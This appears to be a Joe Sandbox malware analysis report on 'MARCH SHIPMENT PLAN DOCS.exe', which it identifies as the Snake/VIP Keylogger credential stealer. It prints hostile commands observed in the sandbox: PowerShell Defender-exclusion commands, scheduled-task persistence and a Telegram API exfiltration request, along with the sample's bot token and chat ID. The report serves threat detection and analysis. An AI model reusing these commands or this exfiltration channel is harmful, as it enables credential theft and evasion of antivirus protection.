Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MARCH SHIPMENT PLAN DOCS.exe

Overview

General Information

Sample name:MARCH SHIPMENT PLAN DOCS.exe
Analysis ID:1629837
MD5:b294137f9559180e8dd17ecf2adb0310
SHA1:98de846a4efbdef91f9bb9e5ab4a27bd6565c3fc
SHA256:b679d845342b0551a231232c04eda781212b888bc3d1ce50a694e480861f81fb
Tags:exeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • MARCH SHIPMENT PLAN DOCS.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe" MD5: B294137F9559180E8DD17ECF2ADB0310)
    • powershell.exe (PID: 7164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7476 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5428 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MARCH SHIPMENT PLAN DOCS.exe (PID: 7240 cmdline: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe" MD5: B294137F9559180E8DD17ECF2ADB0310)
    • MARCH SHIPMENT PLAN DOCS.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe" MD5: B294137F9559180E8DD17ECF2ADB0310)
  • PKjWaa.exe (PID: 7368 cmdline: C:\Users\user\AppData\Roaming\PKjWaa.exe MD5: B294137F9559180E8DD17ECF2ADB0310)
    • schtasks.exe (PID: 7896 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PKjWaa.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Roaming\PKjWaa.exe" MD5: B294137F9559180E8DD17ECF2ADB0310)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat id": "6744331132"}
{"Exfil Mode": "Telegram", "Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat_id": "6744331132", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000014.00000002.3702397792.000000000043A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000014.00000002.3702397792.000000000042A000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x60f5:$a1: get_encryptedPassword
      • 0x641e:$a2: get_encryptedUsername
      • 0x5f05:$a3: get_timePasswordChanged
      • 0x600e:$a4: get_passwordField
      • 0x610b:$a5: set_encryptedPassword
      • 0x77bb:$a7: get_logins
      • 0x771e:$a10: KeyLoggerEventArgs
      • 0x7383:$a11: KeyLoggerEventArgsEventHandler
      00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          20.2.PKjWaa.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            20.2.PKjWaa.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              20.2.PKjWaa.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x2e2f5:$a1: get_encryptedPassword
              • 0x2e61e:$a2: get_encryptedUsername
              • 0x2e105:$a3: get_timePasswordChanged
              • 0x2e20e:$a4: get_passwordField
              • 0x2e30b:$a5: set_encryptedPassword
              • 0x2f9bb:$a7: get_logins
              • 0x2f91e:$a10: KeyLoggerEventArgs
              • 0x2f583:$a11: KeyLoggerEventArgsEventHandler
              20.2.PKjWaa.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x3c0e5:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x3b788:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x3b9e5:$a4: \Orbitum\User Data\Default\Login Data
              • 0x3c3c4:$a5: \Kometa\User Data\Default\Login Data
              20.2.PKjWaa.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x2ef1b:$s1: UnHook
              • 0x2ef22:$s2: SetHook
              • 0x2ef2a:$s3: CallNextHook
              • 0x2ef37:$s4: _hook
              Click to see the 36 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ProcessId: 7164, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ProcessId: 7164, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PKjWaa.exe, ParentImage: C:\Users\user\AppData\Roaming\PKjWaa.exe, ParentProcessId: 7368, ParentProcessName: PKjWaa.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp", ProcessId: 7896, ProcessName: schtasks.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", ProcessId: 5428, ProcessName: schtasks.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ProcessId: 7164, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp", ProcessId: 5428, ProcessName: schtasks.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T08:35:08.857057+010028033053Unknown Traffic192.168.2.749708104.21.32.1443TCP
              2025-03-05T08:35:16.502684+010028033053Unknown Traffic192.168.2.749762104.21.32.1443TCP
              2025-03-05T08:35:18.891970+010028033053Unknown Traffic192.168.2.749779104.21.32.1443TCP
              2025-03-05T08:35:23.972834+010028033053Unknown Traffic192.168.2.749825104.21.32.1443TCP
              2025-03-05T08:35:24.262416+010028033053Unknown Traffic192.168.2.749829104.21.32.1443TCP
              2025-03-05T08:35:27.280837+010028033053Unknown Traffic192.168.2.749856104.21.32.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T08:35:06.994093+010028032742Potentially Bad Traffic192.168.2.749701193.122.130.080TCP
              2025-03-05T08:35:08.291038+010028032742Potentially Bad Traffic192.168.2.749701193.122.130.080TCP
              2025-03-05T08:35:13.275381+010028032742Potentially Bad Traffic192.168.2.749709193.122.130.080TCP
              2025-03-05T08:35:13.994161+010028032742Potentially Bad Traffic192.168.2.749705193.122.130.080TCP
              2025-03-05T08:35:15.931667+010028032742Potentially Bad Traffic192.168.2.749705193.122.130.080TCP
              2025-03-05T08:35:18.900524+010028032742Potentially Bad Traffic192.168.2.749768193.122.130.080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T08:35:34.256465+010018100081Potentially Bad Traffic192.168.2.749900149.154.167.220443TCP
              2025-03-05T08:35:35.488123+010018100081Potentially Bad Traffic192.168.2.749911149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T08:35:28.187583+010018100071Potentially Bad Traffic192.168.2.749858149.154.167.220443TCP
              2025-03-05T08:35:29.541347+010018100071Potentially Bad Traffic192.168.2.749869149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat id": "6744331132"}
              Source: 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat_id": "6744331132", "Version": "4.4"}
              Source: PKjWaa.exe.7948.20.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendMessage"}
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeReversingLabs: Detection: 44%
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeVirustotal: Detection: 52%Perma Link
              Source: MARCH SHIPMENT PLAN DOCS.exeVirustotal: Detection: 52%Perma Link
              Source: MARCH SHIPMENT PLAN DOCS.exeReversingLabs: Detection: 44%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpackString decryptor: 7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpackString decryptor: 6744331132
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpackString decryptor:

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49706 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49747 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49858 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49869 version: TLS 1.2
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: HnGT.pdbSHA256l source: MARCH SHIPMENT PLAN DOCS.exe, PKjWaa.exe.0.dr
              Source: Binary string: HnGT.pdb source: MARCH SHIPMENT PLAN DOCS.exe, PKjWaa.exe.0.dr
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 02F2F45Dh10_2_02F2F2C0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 02F2F45Dh10_2_02F2F4AC
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 02F2F45Dh10_2_02F2F52F
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 02F2FC19h10_2_02F2F961
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F23308h10_2_06F22EF0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F22D41h10_2_06F22A90
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F23308h10_2_06F22EEA
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2D919h10_2_06F2D670
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2EA79h10_2_06F2E7D0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2E1C9h10_2_06F2DF20
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2F781h10_2_06F2F4D8
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2EED1h10_2_06F2EC28
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2D069h10_2_06F2CDC0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2DD71h10_2_06F2DAC8
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F23308h10_2_06F23236
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2D4C1h10_2_06F2D218
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2E621h10_2_06F2E378
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F20D0Dh10_2_06F20B30
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F216F8h10_2_06F20B30
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2F329h10_2_06F2F080
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_06F20040
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 4x nop then jmp 06F2FBD9h10_2_06F2F930
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 0705DD45h12_2_0705E149
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 0122F45Dh20_2_0122F2C0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 0122F45Dh20_2_0122F4AC
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 0122FC19h20_2_0122F970
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069B3308h20_2_069B2EF0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069B2D41h20_2_069B2A90
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_069B0673
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BD919h20_2_069BD670
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BEA79h20_2_069BE7D0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BE1C9h20_2_069BDF20
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BF781h20_2_069BF4D8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BEED1h20_2_069BEC28
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BD069h20_2_069BCDC0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BDD71h20_2_069BDAC8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BD4C1h20_2_069BD218
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069B3308h20_2_069B3236
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069B0D0Dh20_2_069B0B30
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069B16F8h20_2_069B0B30
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BE621h20_2_069BE378
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BF329h20_2_069BF080
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_069B0853
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_069B0040
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 4x nop then jmp 069BFBD9h20_2_069BF930

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49858 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49911 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49869 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49900 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficTCP traffic: 192.168.2.7:51391 -> 162.159.36.2:53
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2005/03/2025%20/%2016:09:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
